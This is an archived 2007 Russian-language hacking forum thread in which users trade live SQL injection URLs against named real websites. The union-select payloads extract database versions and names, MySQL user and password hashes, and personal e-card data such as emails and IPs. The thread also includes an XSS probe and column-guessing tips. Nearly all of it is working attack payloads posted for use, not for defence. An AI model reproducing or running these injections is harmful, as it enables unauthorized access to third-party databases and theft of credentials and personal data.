Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.03.2007, 23:43
|
|
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085
Репутация:
452
|
|
Код:
http://metalistfans.net/news.php?id=-143+union+select+1,2,3,user(),version(),database(),7,8,9/*
Код:
http://www.legia.net/news.php?id=-22483+union+select+1,2,3,user(),5,6,version(),database(),9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
Последний раз редактировалось valiko; 29.03.2007 в 00:06..
|
|
|
29.03.2007, 01:01
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
http://www.allaboutjazz.com/php/review_print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,versi on(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62/*
таблицу не смог подобрать =\
|
|
|
|
29.03.2007, 01:15
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://www.nchtuk.org/content.php?id=-122+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x71),0x71),3,4,5,6,7,8+from+mysql.user/*
|
|
|
|
29.03.2007, 03:06
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
http://arteam.accessroot.com/tutorials.html
В поиске пишем наш код, в данном случае на примере
Код:
"><script>alert('xss')</script>
Выдаст ошибку MySQL ну а там разберетесь))
|
|
|
|
29.03.2007, 03:16
|
|
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592
Репутация:
2175
|
|
попрошу без экстримизма на arteam.accessroot.com
ни4его не косить
|
|
|
|
29.03.2007, 10:32
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816
Репутация:
181
|
|
Код:
http://www.poplavok.info/index.php?mod=article&act=art&id=-1+union+select+1,version(),3,4,5/*
Седня залез на сайт про карасей прочитать, скоро на рыбалку ездить буду, и сразу скулю нашел   ))) |
|
|
|
29.03.2007, 11:22
|
|
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920
Репутация:
369
|
|
А кол-во столбцов может иметь неогранич кол-во? А то я тут 100 ужо проверил, но не подобрал.
|
|
|
|
29.03.2007, 11:55
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.my-tours.ru/calclient/biz_op.php?business_id=-1+union+select+1,2,concat(ecard_sname,char(58),ecard_sip,char(58),ecard_semail,char(58),ecard_rname,char(58),ecard_remail,char(58),card_image,char(58),ecard_heading,char(58),ecard_message,char(58),ecard_sig,char(58),card_template),4,5,6,7,8,9,10+from+card_user+limit+1,1/*
to ЛифчиС5СВ
Кто то скулю выкладывал там было за 100 колонок, а вообще смотри внимательнее мог не заметить, если к примеру вывод в тайтел. |
|
|
|
29.03.2007, 12:08
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от ЛифчиС5СВ
А кол-во столбцов может иметь неогранич кол-во? А то я тут 100 ужо проверил, но не подобрал.
order+by+xxx уже не в моде?
update:
Код:
http://news.qs.kiev.ua/lenta/news_full.php?id=56484+and+2=1+union+select+1,convert(concat(user,0x3a,password)+using+cp1251),3,4,5,6,7,8,9+from+mysql.user/*
Последний раз редактировалось n1†R0x; 29.03.2007 в 12:54..
|
|
|
|
29.03.2007, 13:09
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.clasno.com/foto_pr.php?id=-1+union+select+1,2,3,4,convert(concat(database(),char(58),user(),char(58),version()),char),6,7,8/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
